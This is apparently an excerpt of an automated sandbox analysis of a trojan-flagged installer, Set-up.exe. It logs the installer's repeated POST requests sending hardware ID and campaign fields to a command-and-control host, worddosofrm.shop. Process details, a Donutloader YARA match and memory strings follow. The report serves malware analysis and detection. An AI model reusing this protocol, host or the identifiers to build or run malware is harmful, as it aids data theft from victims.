                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TjNo4KBjOaN83mE1cR%2FtQrnQ7yTC52VYsxd1aG25%2Fr%2FuhTuBnurSpgO5XL8qUXyXIjpbCcCy6HviySTCIh8MHC0qYL%2F24v4zD7kj3BqnU3Yp7TJIyjbU5BDcR9AlgYRpnzvf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2562e5c6c37-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19142&delivery_rate=1906517&cwnd=230&unsent_bytes=0&cid=0e75ee99c14f0156&ts=691&x=0"
2024-11-07 16:39:24 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
Data Ascii: 11ok 173.254.250.79
2024-11-07 16:39:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:39:25 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=8F9JUVKTD98FLYNGQWCQ
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 8799
                                                                                                                                Host: worddosofrm.shop
2024-11-07 16:39:25 UTC | 8799 | OUT |
Data Ascii: --8F9JUVKTD98FLYNGQWCQContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--8F9JUVKTD98FLYNGQWCQContent-Disposition: form-data; name="pid"2--8F9JUVKTD98FLYNGQWCQContent-Disposition: form-data; name="lid"BVnUqo-
2024-11-07 16:39:25 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:25 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=015h3n0i1nnvngdp9s43tvth6d; expires=Mon, 03-Mar-2025 10:26:04 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NZDPNt%2Bv1C9zHiVuJpZbonGfgZvNhhRg%2BwqInteV4csE9YxibQrh5ECzhk8MNnTkfJeaQ0cggCf9vEXbuur4dAP7tWUP9JHjlyz513njITT0CB2pFzp73wkJJ1rk%2Fhjh1r8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec25edef62ca9-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1666&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9740&delivery_rate=1715639&cwnd=251&unsent_bytes=0&cid=c4c6861afa997760&ts=797&x=0"
2024-11-07 16:39:25 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
Data Ascii: 11ok 173.254.250.79
2024-11-07 16:39:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49742 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:39:26 UTC | 295 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=LQ7KQ0ZXPZEACXIL5P81AH845VEGG8T
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 20518
                                                                                                                                Host: worddosofrm.shop
2024-11-07 16:39:26 UTC | 15331 | OUT |
Data Ascii: --LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TContent-Disposition: form-data; name="pid"3--LQ7KQ0ZXPZEACXIL5P81AH845VEGG8TContent-Disposition:
2024-11-07 16:39:27 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=kgnt7gk40kl5htpfvhuunso0t4; expires=Mon, 03-Mar-2025 10:26:06 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9a%2B00sizMV8U3C8tGGqR5hl3KTzlGH7iR2JJIuV0SusXhMatL2MmFtkHzboTCYkRlXQlBkJH9VJ2LkWwZfzQKqyg3Zauafk4j71oto7bjHrWyezvSDT%2BDQ1lL3FTE4OmfZd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2693f16e7bf-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21493&delivery_rate=2236293&cwnd=251&unsent_bytes=0&cid=b806ff1e542eb3fc&ts=813&x=0"
2024-11-07 16:39:27 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
Data Ascii: 11ok 173.254.250.79
2024-11-07 16:39:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-07 16:39:28 UTC | 286 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=FX1DFU84BK80CT6OHR9I3CQ
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 7167
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:28 UTC7167OUTData Raw: 2d 2d 46 58 31 44 46 55 38 34 42 4b 38 30 43 54 36 4f 48 52 39 49 33 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 46 58 31 44 46 55 38 34 42 4b 38 30 43 54 36 4f 48 52 39 49 33 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 58 31 44 46 55 38 34 42 4b 38 30 43 54 36 4f 48 52 39 49 33 43 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a
                                                                                                                                Data Ascii: --FX1DFU84BK80CT6OHR9I3CQContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--FX1DFU84BK80CT6OHR9I3CQContent-Disposition: form-data; name="pid"1--FX1DFU84BK80CT6OHR9I3CQContent-Disposition: form-data; name="lid"
                                                                                                                                2024-11-07 16:39:29 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=t3hihtbth035lgu05ilofe43ni; expires=Mon, 03-Mar-2025 10:26:08 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e6eZ8qtaDZ%2BmCyk79L%2B0xwDvr8qKKgrkXl9l0dRoYwVgf3EYgO65cZWsVm8m%2FnXh88b3TEHgSgHE0895o6JgfIpKlqnKE4WanORFGKl3sfzYgXOfKUBfSG3ncbXwOLPvrjgj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2753a9d2d3b-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1613&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=8089&delivery_rate=1737252&cwnd=237&unsent_bytes=0&cid=64322049f635abb8&ts=769&x=0"
                                                                                                                                2024-11-07 16:39:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                6 | 192.168.2.4 | 49745 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-07 16:39:30 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=ALCFCPHXC9MFFVET4DI3NY
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 7129
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:30 UTC7129OUTData Raw: 2d 2d 41 4c 43 46 43 50 48 58 43 39 4d 46 46 56 45 54 34 44 49 33 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 41 4c 43 46 43 50 48 58 43 39 4d 46 46 56 45 54 34 44 49 33 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4c 43 46 43 50 48 58 43 39 4d 46 46 56 45 54 34 44 49 33 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42
                                                                                                                                Data Ascii: --ALCFCPHXC9MFFVET4DI3NYContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--ALCFCPHXC9MFFVET4DI3NYContent-Disposition: form-data; name="pid"1--ALCFCPHXC9MFFVET4DI3NYContent-Disposition: form-data; name="lid"B
                                                                                                                                2024-11-07 16:39:30 UTC | 1011 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=6vn87lqflk7cq1jnjdc60lacek; expires=Mon, 03-Mar-2025 10:26:09 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pC7RaOqIzfbhSW2ZkcgKsG3PrlLULifOohz1FlO3%2F55A0CIGsc0isqzfsFz0zdeUjcURNAZTFYi3hBKR8esSdpy%2B%2FkvFjDBmVdTXr4RECsYSIXybH7W7fKAZ2QO%2FwBvLdtDI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec27e6dbbe746-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1339&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2840&recv_bytes=8050&delivery_rate=2156366&cwnd=251&unsent_bytes=0&cid=38c97ac0a4012034&ts=498&x=0"
                                                                                                                                2024-11-07 16:39:30 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                7 | 192.168.2.4 | 49746 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-07 16:39:31 UTC | 293 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=4Y5L8AKJLU3H5MK5B6ICOFB232B8L7
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 1322
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:31 UTC1322OUTData Raw: 2d 2d 34 59 35 4c 38 41 4b 4a 4c 55 33 48 35 4d 4b 35 42 36 49 43 4f 46 42 32 33 32 42 38 4c 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 34 59 35 4c 38 41 4b 4a 4c 55 33 48 35 4d 4b 35 42 36 49 43 4f 46 42 32 33 32 42 38 4c 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 59 35 4c 38 41 4b 4a 4c 55 33 48 35 4d 4b 35 42 36 49 43 4f 46 42 32 33 32 42 38 4c 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f
                                                                                                                                Data Ascii: --4Y5L8AKJLU3H5MK5B6ICOFB232B8L7Content-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--4Y5L8AKJLU3H5MK5B6ICOFB232B8L7Content-Disposition: form-data; name="pid"1--4Y5L8AKJLU3H5MK5B6ICOFB232B8L7Content-Disposition: fo
                                                                                                                                2024-11-07 16:39:32 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=s8i5v99rgrjtubp3ublhp202lc; expires=Mon, 03-Mar-2025 10:26:11 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRjGJ2gIpah7EQqa4FiZTDdihQoQnY5Mo2MAlaEI0OY3FnUeAMA%2FYE%2BbQUic%2BsFYIOptYk%2FWbYYmR8bUOAKXtHGlNTqWgRh7R%2FNxK2x7ARi%2BGTuzRpddRnXmJfxwDvbh25Pc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2895a1d2cbd-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1431&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2251&delivery_rate=2011111&cwnd=240&unsent_bytes=0&cid=2315a0d1f07464cb&ts=747&x=0"
                                                                                                                                2024-11-07 16:39:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                8 | 192.168.2.4 | 49747 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-07 16:39:33 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=3EC22CYO6BIE0TIXW6C3VN
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 1144
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:33 UTC1144OUTData Raw: 2d 2d 33 45 43 32 32 43 59 4f 36 42 49 45 30 54 49 58 57 36 43 33 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 33 45 43 32 32 43 59 4f 36 42 49 45 30 54 49 58 57 36 43 33 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 45 43 32 32 43 59 4f 36 42 49 45 30 54 49 58 57 36 43 33 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42
                                                                                                                                Data Ascii: --3EC22CYO6BIE0TIXW6C3VNContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--3EC22CYO6BIE0TIXW6C3VNContent-Disposition: form-data; name="pid"1--3EC22CYO6BIE0TIXW6C3VNContent-Disposition: form-data; name="lid"B
                                                                                                                                2024-11-07 16:39:34 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=qg3got8n56ln4h2p8h5qbempav; expires=Mon, 03-Mar-2025 10:26:12 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=euuhN%2FytGlnfdgQjd8qfA5mKAZlVU%2FhUZfvyf%2FLJkyDneH4WqiY24fw%2Bh%2BzSoTxZ0hyaDhsJ8gErZxv2HFz6qkv3%2B1uz8iECPgZd3vxGYrx2JMhf1155w2DmCrzk6iEwPxgO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec29229602e2d-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2065&delivery_rate=2616079&cwnd=251&unsent_bytes=0&cid=f2f0efe20a00bee0&ts=998&x=0"
                                                                                                                                2024-11-07 16:39:34 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                9 | 192.168.2.4 | 49748 | 104.21.16.142 | 443 | 6544 | C:\Users\user\Desktop\Set-up.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-11-07 16:39:35 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 117
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:35 UTC117OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 61 62 6f 62 61 34 35 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33 26 68 77 69 64 3d 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42
                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@aboba45&j=7c263357d04aff473cb2eda8a42ff033&hwid=6A5015BFFC3EE0A156626D7828374B6B
                                                                                                                                2024-11-07 16:39:35 UTC | 1013 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=5c7dr17fds00pcjub0as0sgj8n; expires=Mon, 03-Mar-2025 10:26:14 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yynuk%2BEm6eecgwIOz8TbWXI9JGZNRNSii0dvblzZvxal8NdK2rkMqQ5BUF27SIB%2FUvW49NYS20Ry2UNn9gq%2FTdF9TRokMkjqgfCLjQAFNtTSq%2Fuc%2Fm%2F7aIC1Z4XQ7YNlDZpb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec29c583ce7af-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1018&delivery_rate=2166043&cwnd=78&unsent_bytes=0&cid=bed49aeae4171e18&ts=353&x=0"



                                                                                                                                Target ID:0
                                                                                                                                Start time:11:39:05
                                                                                                                                Start date:07/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                Imagebase:0xe30000
                                                                                                                                File size:14'085'344 bytes
                                                                                                                                MD5 hash:206D3EDE48DB6ABCD0887AAB3442A590
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true


                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:1.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                  Signature Coverage:39.1%
                                                                                                                                  Total number of Nodes:220
                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $ $#$$$)$+$,$-$/$2$3$5$7$8$9$:$:$;$<$A$B$B$C$C$C$D$D$D$E$G$I$K$K$L$M$M$O$O$O$P$P$Q$R$S$S$T$U$U$U$W$Y$Z$[$]$]$_$`$b$c$d$f$f$i$k$p$q$q$q$q$r$s$s$s$u$u$u$w$w$w$w$x$x$y${$}$~
                                                                                                                                  • API String ID: 0-581412767
                                                                                                                                  • Opcode ID: ba45db846503753e6ad8cd74702e647084946835c16c25e977fe34de56c6ae81
                                                                                                                                  • Instruction ID: 182163949eeda5fcdd4c5ddd22517cfb662c3115da359767ce5eb4e2f496d273
